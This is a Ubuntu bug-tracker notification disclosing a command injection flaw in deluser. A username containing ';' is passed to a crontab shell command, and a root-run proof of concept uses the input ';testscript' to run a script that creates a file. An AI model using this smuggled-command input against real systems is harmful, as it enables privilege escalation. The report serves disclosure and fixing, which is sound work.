*** This bug is a security vulnerability ***
You have been subscribed to a public security bug by Marc Deslauriers
(mdeslaur):
deluser program is vulnerable to a command injection vulnerability when
a user is added via adduser with special characters (such as ';'). It is
only possible when the user exists on the system (adduser does not
prevent usernames with ';' to be added.)
This can be a security risk when user accounts on the system can be
created from arbitrary input, and there are exploitable programs in PATH
to make privilege escalation possible.
-------------- Proof of concept ----------------
# ll /test-file
ls: cannot access '/test-file': No such file or directory
# cat /usr/bin/testscript
#!/bin/bash
touch /test-file
# deluser
Enter a user name to remove: ;testscript
no crontab for root
crontab: usage error: no arguments permitted after this option
usage: crontab [-u user] file
crontab [ -u user ] [ -i ] { -e | -l | -r }
(default operation is replace, per 1003.2)
-e (edit user's crontab)
-l (list user's crontab)
-r (delete user's crontab)
-i (prompt before deleting user's crontab)
/usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1.
Exiting.
(failed reverse-i-search)`': deluser^C
# ll /test-file
-rw------- 1 root root 0 Jul 31 10:25 /test-file
-------- system description --------
Description: Ubuntu 18.04.2 LTS
Release: 18.04
# apt-cache policy adduser
adduser:
Installed: 3.116ubuntu1
Candidate: 3.116ubuntu1
Version table:
*** 3.116ubuntu1 500
500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
100 /var/lib/dpkg/status
** Affects: adduser (Ubuntu)
Importance: Undecided
Status: Incomplete
** Tags: adduser command deluser injection security
--
adduser & deluser shell command injection
https://bugs.launchpad.net/bugs/1838489
You received this bug notification because you are a member of Ubuntu Bugs,
which is subscribed to the bug report.
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
